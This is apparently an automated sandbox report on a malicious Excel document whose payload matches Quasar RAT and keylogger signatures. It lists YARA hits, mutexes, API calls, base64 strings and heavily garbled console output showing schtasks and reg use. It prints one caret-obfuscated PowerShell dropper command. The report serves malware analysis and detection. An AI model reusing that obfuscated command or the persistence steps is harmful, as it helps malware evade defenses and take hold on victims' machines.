          Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
          Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5DVxvgK9jn5gaBl[1].exe.28.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: eyBLwzbrUF1mwXoy.exe.28.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 5DVxvgK9jn5gaBl[1].exe0.28.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: JrekdQ.exe.31.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???ue004?u1bf6u2a06u0d01????????????.csBase64 encoded string: 'muWPA0ZMZOZC16alqlb7OLoKFF6AK/WGExjSh2sTLzY/HNKE8rw/LjwNO8jxwG5P8XmanhcHXUh/Znan/Qha9A==', 'kdZuJNg3s3qi60d8KAw+Ogu5e+94NKyEBSKgEBwFzCVWwu2kGt++qLwK8TBsq+lTBXxsNcIHpRZ1cGkVMYWvzTSaElwiShLbehLklNW4YYQ=', '+bLBtFqvA62b9vNvvPQyjmGK2WpZ+RJ9pUtoxTtsb8K6WfUawvz1gS5iut++GrF4DuuuMzkFiMCEyLF9AaegJA==', 'v2HDs4RSygEAZ6NJNCuYwi0ACuluvNLNbRFYPlxXUpO0FxzAGLWq3OXdsjP5+ukjo6yDLqnUGh7wyi7nDtq/CQ==', 'jqflyylK/niLKf+GtR+Lv/aWEa6QVqAQUCBDd050Ntb2fHHztlgQMTWdADeZZF3mFDd9u+0ou/K5Jphk6b3V7Q==', 'rle7N1m2WcaSri/+BJFoH9R3R4bb8EbkaU2TYWRdWojx+g1t9ncREIrAWOvoDmETZzEe0Mw/2wR+/BF8yljPoBTG+f/JAv1YhyEeXfJysig=', 'z4mS0TG28az/6Zq6H1EWK43Z0L6V2PnE7ouOqTwEvdoVRXfhtFMdqKebh3cw7r71i5/CG3g7acrI4B9cvpwiqaer8YOnmXcM7ZzRm/qc8r4=', 'g0diI4GsK+sU5dVZUm/Qgsee4D9atKNMOgUKjSgMfBv6DVapU0ZNn4j2bVXd9/eONJ0gi7LLAe4+P+1lOMyL5Q=='
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@57/27@7/5
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_00960AB2 AdjustTokenPrivileges,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_00960A7B AdjustTokenPrivileges,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0042A2F9 __EH_prolog,CoInitialize,CoCreateInstance,CoUninitialize,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\CCDE0000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeMutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_dQvCIzmEBFgxmMuIEE
          Source: C:\Users\user\AppData\Roaming\sp.exeMutant created: \Sessions\1\BaseNamedObjects\614c1de794e5e2f8f0d3a4fae3ccc083
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD690.tmpJump to behavior
          Source: spetsifikatsiya.xlsOLE indicator, Workbook stream: true
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........h.......F...............F.......A.....`IC........v.....................KJ.............l.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j.....u................1.............}..v....xv......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v.....z......0.\.............x.......$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j....@{................1.............}..v.....{......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.\.....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.1.............}..v............ ...............x.......".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j......................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....P.................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......................1.............}..v............0.\.....................^.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......................1.............}..v....0.......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......................1.............}..v....P.......0.\.....................Z.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......................1.............}..v....P.......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......................1.............}..v............0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......1.............}..v....(.......0.\.............x...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j......................1.............}..v....`.......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......................1.............}..v............0.\.............x...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................1.............}..v....(.......0.\.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........h.......F...............F.......A.....`IC........v.....................KJ.............r.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j.....z................1.............}..v.....z......0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v.....~......0.\.............8.w.....$.......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j....P.................1.............}..v............0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.1.............}..v............0.\.............8.w.....".......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......................1.............}..v............0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j......w...............1.............}..v....@.......0.\.....................`.......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j......................1.............}..v....x.......0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......w...............1.............}..v............0.\.....................^.......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....X.................1.............}..v............0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......w...............1.............}..v............0.\.....................`.......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......................1.............}..v....8.......0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......w...............1.............}..v............0.\.............................h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......................1.............}..v....8.......0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.1.............}..v....H.......0.\.............8.w.....".......h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j......................1.............}..v............0.\...............w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......w...............1.............}..v............0.\.............8.w.............h...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................1.............}..v....H.......0.\...............w.............h...............
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............................@{?......................k..U.....................C.............(.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J....
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............m.o.d.e........./.........................*......$.J............/...............8.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... .1.8.,.1. .............................$d..U...m.o.d.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\.......................................................$d..U...m.o.d.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............................@{?......................k..U.....................C.............(.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J....
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............c.o.l.o.r......./.........................*......$.J............/...............8.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H............... .F.E. .................................$d..U...c.o.l.o..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H.......................................................$d..U...c.o.l.o..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H........................................................k..U.....................C.............(.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J....
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............s.e.t.l.o.c.a.l./.........................*......$.J............/...............8.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H.......................................................$d..U...s.e.t.l..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H..................................J.....................k..U...`{.J..............C.............(.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............f.o.r...........`{.J....................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H............... ./.F...........`{.J....................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H............... .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H............... .%.i. .i.n. ...=.4.-.5.................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............(.'.v.e.r.'.). .d.o. .5.................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............s.e.t...........d.o. .5.................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H............... .V.E.R.S.I.O.N.=.%.i...%.j. ............d..U...s.e.t............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H................................DC.....................$d..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................................p.D.....................di..U............iC.......................*..............iC.............
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............*.....2..................J....
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.e.t............\D.......................C...............D........J....x.........*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .V.E.R.S.I.O.N.=.6...1. ...............Dj..U...s.e.t....iC.......................*..............iC.............
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................................=.6...1.................Dj..U...s.e.t....iC.......................*..............iC.............
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................................`{.J.....................k..U....$.J..............C.............(.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............i.f. ...........`{.J....................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............".6...1.". .=.=. .".1.0...0.". ..........d..U...i.f. ............DC...............*..... .......................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............(................DC..................... .......................d1.........v......*........................J....
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H........................................................d..U...(................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............e.c.h.o.........}..v............................H...............................x.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........DC.............H.*.....0.......................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H............... ..... ..........DC......................e..U....................DC.............x.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................H...............r.e.g...........}..v............................H.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................e..U...r.e.g............DC.....................b.......................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>.....................................te..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. .................................te..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................e..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .2. . ............................j..U...t.i.m.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................j..U... ./.t. ..........DC.............X.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............n.u.l. ..................................j..U... ./.t. ..........DC.............X.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... ..... .........d1......................te..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\........................................................j..U...s.c.h.t..........DC.....................v.......................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............1.>.....................................4j..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............n.u.l. .................................4j..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... ..... .........d1.......................j..U....................DC.............X.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... ./.t. .3. . ...........................dj..U...t.i.m.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............1.>.....................................Tj..U... ./.t. ..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............n.u.l. .................................Tj..U... ./.t. ..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... ..... .........d1......................4j..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............r.e.g...........d1......................4j..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\.......................................................dj..U...r.e.g............DC.....................T.......................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\........................................................d..U......J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............). ......................................d..U......J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\................................DC.....................$d..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............................`{.J.....................k..U....$.J..............C.............(.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J....
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............i.f. ...........`{.J....................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............".6...1.". .=.=. .".6...3.". ............d..U...i.f. ............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............(................DC.............................................d1.........v......*........................J....
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\........................................................d..U...(................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............e.c.h.o.........}..v............................\.......j.......................x.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........DC.............H.*.....2.......................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........DC......................e..U....................DC.............x.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................................~.........................*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... ..... .........d1.......................e..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... ./.t. .2. . ............................j..U...t.i.m.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............1.>......................................j..U... ./.t. ..........DC.............X.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............".6...1.". .=.=. .".6...2.". ............d..U...i.f. ............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............e.c.h.o.........}..v............................\.......M.......................x.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........DC.............H.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\............... ..... ..........DC......................e..U....................DC.............x.*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............r.e.g...........}..v............................\......._.........................*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\........................................................e..U...r.e.g............DC.....................b.......................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............1.>.....................................te..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............n.u.l. .................................te..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............".6...1.". .=.=. .".6...1.". ............d..U...i.f. ............DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............C.m.d...........................................(................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\.......................................................Dd..U...C.m.d............DC.............................................
          Source: C:\Windows\System32\cmd.exeConsole Write: ................\...............). ..............DC......................d..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......*.......*.....x.*.....B.......................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.............,.......................................................................................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................X.......(.P.............................Y.......................................................................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................\...........E.R.R.O.R.:. ...........................N.......................................h.#.............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................\...........E.R.R.O.(.P.............................T...............................................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
